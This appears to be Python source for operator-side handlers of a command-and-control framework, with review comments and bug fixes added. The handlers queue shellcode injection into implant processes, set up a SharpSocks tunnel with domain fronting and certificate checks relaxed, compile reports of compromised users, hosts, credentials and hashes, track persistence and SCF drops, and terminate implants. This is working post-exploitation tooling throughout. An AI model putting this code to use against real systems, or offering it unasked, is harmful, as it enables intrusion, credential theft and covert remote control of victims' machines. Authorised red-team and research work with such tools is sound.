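def do_migrate(user, command, randomuri):
    """Queue an Inject-Shellcode task for the implant identified by *randomuri*.

    The shellcode file is picked from the implant record: field 10 is compared
    with "AMD64" to choose the x64 or x86 build, and field 15 (the comms type)
    chooses the C#, Daisy or Proxy file under ``PayloadsDirectory``.

    Args:
        user: operator name passed through to ``new_task``.
        command: operator command line; every case-insensitive occurrence of
            "migrate" is removed and the remainder is appended to the task.
        randomuri: identifier of the implant the task is queued for.

    Returns:
        None. When the comms type matches no known variant nothing is queued.
    """
    params = re.sub("migrate", "", command, flags=re.IGNORECASE)
    implant = get_implantdetails(randomuri)
    implant_arch = implant[10]
    implant_comms = implant[15]
    arch = "64" if implant_arch == "AMD64" else "86"

    if implant_comms == "C#":
        prefix = ""
    elif "Daisy" in implant_comms:
        # NOTE(review): the typed name is interpolated into the file path
        # unchecked; a value containing path separators would resolve outside
        # PayloadsDirectory.
        prefix = input("Name required: ")
    elif "Proxy" in implant_comms:
        prefix = "Proxy"
    else:
        # The original fell through here with `path` and `shellcodefile`
        # unbound and died with UnboundLocalError; stop before tasking instead.
        print("Unsupported comms type for migrate: %s" % implant_comms)
        return

    path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, prefix, arch)
    shellcodefile = load_file(path)

    # The whole payload travels base64-encoded inside the task text; the file
    # name follows '#' (presumably as a label for the task log - confirm).
    encoded = base64.b64encode(shellcodefile).decode("utf-8")
    new_task(
        "run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (encoded, params, os.path.basename(path)),
        user,
        randomuri,
    )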
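def do_migrate(user, command, randomuri):
    """Queue the two PowerShell tasks that stage and run Inject-Shellcode.

    The shellcode file is picked from the implant record: field 10 is compared
    with "AMD64" to choose the x64 or x86 build, and field 15 (the comms type)
    chooses the PS, Daisy or Proxy file under ``PoshProjectDirectory``/payloads.

    Args:
        user: operator name passed through to ``new_task``.
        command: operator command line; every case-insensitive occurrence of
            "migrate" is removed and the remainder is appended to the second
            task.
        randomuri: identifier of the implant the tasks are queued for.

    Returns:
        None. When the comms type matches no known variant nothing is queued
        and the module-loaded check is not triggered.
    """
    params = re.sub("migrate", "", command, flags=re.IGNORECASE)
    implant = get_implantdetails(randomuri)
    implant_arch = implant[10]
    implant_comms = implant[15]
    arch = "64" if implant_arch == "AMD64" else "86"

    if implant_comms == "PS":
        prefix = ""
    elif "Daisy" in implant_comms:
        # NOTE(review): the typed name is interpolated into the file path
        # unchecked; a value containing path separators would resolve outside
        # the payloads directory.
        prefix = input("Name required: ")
    elif "Proxy" in implant_comms:
        prefix = "Proxy"
    else:
        # The original fell through here with `path` and `shellcodefile`
        # unbound and died with UnboundLocalError after already calling
        # check_module_loaded; stop before any side effect instead.
        print("Unsupported comms type for migrate: %s" % implant_comms)
        return

    path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, prefix, arch)
    shellcodefile = load_file(path)

    check_module_loaded("Inject-Shellcode.ps1", randomuri, user)

    # First task: assign the base64 payload to $Shellcode64 / $Shellcode86.
    # The file name follows '#' (presumably a label for the task log - confirm).
    encoded = base64.b64encode(shellcodefile).decode("utf-8")
    new_task(
        "$Shellcode%s=\"%s\" #%s" % (arch, encoded, os.path.basename(path)),
        user,
        randomuri,
    )
    # Second task: decode that variable and hand it to Inject-Shellcode along
    # with whatever arguments the operator typed after "migrate".
    new_task(
        "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params),
        user,
        randomuri,
    )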
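def do_sharpsocks(user, command, randomuri):
    """Prepare a SharpSocks session and, on confirmation, queue the client task.

    Generates a 25-letter channel name and a key, prints the matching server
    command line for the operator, then asks before queueing the
    ``Sharpsocks -Client`` task and labelling the implant "SharpSocks".

    Args:
        user: operator name passed through to ``new_task``.
        command: operator command line (not used here).
        randomuri: identifier of the implant the task is queued for.

    Returns:
        None.
    """
    check_module_loaded("SharpSocks.ps1", randomuri, user)
    import string
    from random import choice

    # NOTE(review): `random` is not a cryptographic source. That is fine for a
    # channel identifier, but the channel name should not be treated as secret.
    allchar = string.ascii_letters
    channel = "".join(choice(allchar) for x in range(25))
    sharpkey = gen_key().decode("utf-8")
    sharpurls = get_sharpurls()
    sharpurl = select_item("PayloadCommsHost", "C2Server")
    sharpport = select_item("PayloadCommsPort", "C2Server")
    dfheader = select_item("DomainFrontHeader", "C2Server")
    implant = get_implantdetails(randomuri)
    pivot = implant[15]

    if pivot != "PS":
        sharpurl = input("Enter the URL for SharpSocks: ")

    # NOTE(review): if select_item returns the port as a string, both integer
    # comparisons are always true and the port is always appended - confirm
    # the stored type.
    if (sharpport != 80 and sharpport != 443):
        if (sharpurl.count("/") >= 3):
            # Insert the port before the first single '/' (the one that starts
            # the path, not the '//' after the scheme). The original passed
            # the builtin `str` as the subject string, which raises TypeError;
            # the URL itself is the intended subject.
            pat = re.compile(r"(?<!/)/(?!/)")
            sharpurl = pat.sub(":%s/" % sharpport, sharpurl, 1)
        else:
            sharpurl = ("%s:%s" % (sharpurl, sharpport))

    # NOTE(review): the session key is echoed to the console here and embedded
    # in the task text below, so terminal scrollback and anything that stores
    # task text will hold it in clear.
    print(PoshInstallDirectory + "resources/SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)

    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    if ri.lower() == "n":
        print("")
    if (ri == "") or (ri.lower() == "y"):
        # NOTE(review): '-Insecure' is passed unconditionally; presumably it
        # relaxes certificate validation on the client - confirm and document.
        taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
        if dfheader:
            taskcmd += " -DomainFrontURL %s" % dfheader
        new_task(taskcmd, user, randomuri)
        update_label("SharpSocks", randomuri)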
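def do_opsec(user, command):
    """Print an engagement summary built from the implant and task records.

    The report lists users, hosts, URLs, uploaded files (with the MD5 recorded
    in the task text, where present), credentials and hashes, then waits for
    Enter and clears the screen.

    Args:
        user: operator name (not used here).
        command: operator command line (not used here).

    Returns:
        None.
    """
    implants = get_implants_all()
    comtasks = get_tasks()
    hosts = ""
    uploads = ""
    urls = ""
    users = ""
    # Exact-match de-duplication. The original tested `value not in <report
    # string>`, a substring test, so a host such as "10.0.0.1" was dropped
    # once "10.0.0.10" had been listed. Empty values stay excluded, as before.
    seen_hosts = set()
    seen_urls = set()
    seen_users = set()

    for i in implants:
        if i[3] and i[3] not in seen_hosts:
            seen_hosts.add(i[3])
            hosts += "%s \n" % i[3]
        if i[9] and i[9] not in seen_urls:
            seen_urls.add(i[9])
            urls += "%s \n" % i[9]

    for t in comtasks:
        hostname = get_implantdetails(t[1])
        # Local name kept distinct from the `command` parameter it used to shadow.
        task_command = t[2].lower()
        output = t[3].lower()

        if hostname[2] and hostname[2] not in seen_users:
            seen_users.add(hostname[2])
            users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3])

        if "invoke-pbind" in task_command and "connected" in output:
            # re.search returns None when "-target " is absent; the original
            # indexed the result unconditionally and raised TypeError.
            tg = re.search("(?<=-target )\\S*", task_command)
            target = tg[0] if tg else ""
            if target and target not in seen_hosts:
                seen_hosts.add(target)
                hosts += "%s \n" % target

        if "uploading file" in task_command:
            detail = task_command.partition("uploading file: ")[2].strip()
            name_part, _, hash_part = detail.partition(" with md5sum:")
            filehash = hash_part.strip()
            uploadedfile = name_part.strip().strip('"')
            uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)

        if "installing persistence" in output:
            # NOTE(review): this looks up the implant by t[2] (the task text)
            # while the lookup at the top of the loop uses t[1] - confirm
            # which column is intended.
            implant_details = get_implantdetails(t[2])
            line = task_command.replace('\n', '').replace('\r', '')
            # partition() yields "" when there is no ':'; split(":", 1)[1]
            # raised IndexError in that case.
            filenameuploaded = line.rstrip().partition(":")[2]
            uploads += "%s %s \n" % (implant_details[3], filenameuploaded)

        if "written scf file" in output:
            # NOTE(review): same t[2] lookup as above - confirm.
            implant_details = get_implantdetails(t[2])
            # str has no indexof(); the original raised AttributeError here.
            # Keep the text from the first ':' onwards, or all of it if none.
            colon = output.find(':')
            scf_detail = output[colon:] if colon != -1 else output
            uploads += "%s %s\n" % (implant_details[3], scf_detail)

    creds, hashes = parse_creds(get_creds())
    print_good(
        "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
        % (users, hosts, urls, uploads, creds, hashes))
    input("Press Enter to continue...")
    clear()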
def do_kill_implant(user, command, randomuri):
    """Ask for confirmation, then queue "exit" and mark the implant as killed.

    An empty answer or "y" (any case) confirms; "n" (any case) prints a notice
    and does nothing else; any other answer is ignored silently.

    Args:
        user: operator name passed through to ``new_task``.
        command: operator command line (not used here).
        randomuri: identifier of the implant to terminate.

    Returns:
        None.
    """
    details = get_implantdetails(randomuri)
    answer = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % details[0])
    lowered = answer.lower()

    if lowered == "n":
        print("Implant not terminated")

    # Empty input takes the default shown in the prompt, which is "Y".
    confirmed = answer == "" or lowered == "y"
    if confirmed:
        new_task("exit", user, randomuri)
        kill_implant(randomuri)
def do_tasks(user, command):
    """Print every queued task with its implant ID and account, then pause.

    Args:
        user: operator name (not used here).
        command: operator command line (not used here).

    Returns:
        None.
    """
    queued = get_newtasks_all()
    if queued is None:
        print_good("No tasks queued!\r\n")
    else:
        rows = []
        for entry in queued:
            # entry[1] identifies the implant the task belongs to.
            owner = get_implantdetails(entry[1])
            account = "%s\\%s" % (owner[11], owner[2])
            rows.append("[%s] : %s | %s\r\n" % (owner[0], account, entry[2]))
        print_good("Queued tasks:\r\n\r\n%s" % "".join(rows))
    input("Press Enter to continue...")
    clear()
def do_modulesloaded(user, command, randomuri):
    """Print field 14 of the implant record and queue a "listmodules" task.

    Field 14 is presumably the server-side record of loaded modules, going by
    the handler name - confirm against the implant table.

    Args:
        user: operator name passed through to ``new_task``.
        command: operator command line (not used here).
        randomuri: identifier of the implant to query.

    Returns:
        None.
    """
    record = get_implantdetails(randomuri)
    recorded_modules = record[14]
    print(recorded_modules)
    # The queued task asks the implant itself for its module list.
    new_task("listmodules", user, randomuri)
def do_modulesloaded(user, command, randomuri):
    """Print field 14 of the implant record for *randomuri*.

    Field 14 is presumably the server-side record of loaded modules, going by
    the handler name - confirm against the implant table. No task is queued.

    Args:
        user: operator name (not used here).
        command: operator command line (not used here).
        randomuri: identifier of the implant to look up.

    Returns:
        None.
    """
    record = get_implantdetails(randomuri)
    recorded_modules = record[14]
    print(recorded_modules)
def do_get_pid(user, command, randomuri):
    """Print field 8 of the implant record for *randomuri*.

    Field 8 is presumably the implant's process ID, going by the handler
    name - confirm against the implant table.

    Args:
        user: operator name (not used here).
        command: operator command line (not used here).
        randomuri: identifier of the implant to look up.

    Returns:
        None.
    """
    record = get_implantdetails(randomuri)
    recorded_pid = record[8]
    print(recorded_pid)